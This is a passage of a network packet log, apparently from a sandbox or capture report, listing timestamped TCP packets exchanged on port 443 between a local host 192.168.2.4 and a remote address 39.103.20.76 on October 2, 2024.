Oct 2, 2024 04:27:35.426646948 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426659107 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426666021 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426696062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426698923 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426718950 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426723957 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426745892 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426755905 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426800013 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426805019 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426847935 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.426868916 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.426922083 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.429191113 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.429250002 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.429286957 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.429338932 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.429371119 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.429425955 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.429480076 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.429533958 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.430229902 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.430282116 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.430283070 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.430294991 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.430330992 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.430347919 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.431118011 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.431174994 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.431247950 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.431303978 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.432854891 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.432900906 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.432934046 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.432940960 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.432955980 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.432990074 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.434426069 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.434477091 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.434492111 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.434498072 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.434530020 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.434556007 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.434833050 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.434895039 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.434915066 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.434977055 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.435087919 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.435157061 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.435226917 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.435281992 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.541357040 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.541404009 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.541449070 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.541457891 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.541507006 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.544981956 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.545034885 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.545058012 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.545063972 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.545094967 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.545116901 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.548899889 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.548973083 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.548981905 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549038887 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549052954 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549108982 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549146891 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549215078 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549230099 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549287081 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549290895 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549308062 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549340963 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549365044 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549438000 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549499989 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549567938 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549617052 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549624920 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549631119 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549670935 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549676895 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549691916 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549726009 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549746990 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549838066 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549895048 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.549902916 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.549962997 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.550810099 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.550874949 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.550913095 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.550970078 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.550971031 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.550983906 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551023006 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551045895 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551120996 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551163912 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551187038 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551193953 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551232100 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551249981 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551337957 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551403046 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551412106 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551456928 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551470995 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551476955 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551512003 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551619053 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551673889 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551703930 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551759958 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551852942 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551897049 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551908016 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551913977 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.551949024 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.551990986 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.552045107 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.552130938 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.552186966 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.552334070 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.552386045 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.552416086 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.552473068 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.606787920 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.632378101 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.632421017 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.632435083 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.632440090 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.632469893 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.632492065 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642065048 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642106056 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642139912 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642146111 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642198086 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642241955 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642298937 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642299891 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642318010 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642352104 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642371893 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642374039 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642385960 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642420053 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642433882 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642455101 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642461061 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642491102 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642497063 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642545938 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642546892 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642559052 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642594099 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642606020 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642630100 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642637014 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642646074 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642659903 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642664909 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642692089 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642697096 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642716885 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642730951 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642771006 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642776966 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642792940 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642833948 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642836094 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642848969 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.642868996 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642908096 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.642985106 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643038988 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643043995 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643050909 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643094063 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643110991 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643162966 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643165112 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643182993 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643210888 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643232107 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643239021 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643286943 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643291950 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643309116 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643347979 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643362045 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643409014 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643414974 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643421888 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643462896 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643476963 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643523932 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643536091 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643585920 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643703938 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643757105 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643758059 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643769979 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643804073 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643822908 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643832922 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643837929 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643868923 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643872023 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643906116 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643910885 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643928051 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643940926 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643978119 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.643985987 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.643992901 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.644032001 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.661540031 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.723289013 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.723390102 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.723428965 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.723436117 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.723485947 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.732959986 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733033895 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733036041 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733048916 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733095884 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733114004 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733164072 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733165026 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733175993 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733210087 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733221054 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733232975 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733238935 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733278036 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733369112 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733421087 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733431101 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733477116 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733480930 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733488083 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733526945 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733537912 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733584881 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733591080 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733597040 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733627081 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733644962 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733648062 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733656883 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733692884 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733697891 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733728886 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733733892 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733762026 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733791113 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733798027 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733803988 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733846903 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733877897 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733922958 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733932972 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733938932 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.733968973 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.733993053 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734071016 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734126091 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734128952 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734141111 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734180927 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734181881 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734211922 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734216928 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734251022 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734280109 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734311104 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734369040 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734374046 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734380960 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734419107 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734427929 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734431982 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734441996 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734482050 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734484911 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734497070 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734534025 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734553099 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734607935 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734678030 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734729052 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734734058 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734740019 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734771967 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734786987 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734859943 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734918118 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734920025 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734932899 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.734967947 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.734983921 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.735033989 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.735080004 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.735125065 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.735131025 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.735136986 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.735183954 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.752033949 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.831649065 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.831686020 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.831722975 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.831729889 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.831780910 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842210054 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842272043 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842288017 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842293024 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842324972 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842340946 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842345953 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842374086 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842375040 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842398882 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842402935 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842427969 CEST	443	49740	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:35.842441082 CEST	49740	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:35.842472076 CEST	443	49740	39.103.20.76	192.168.2.4
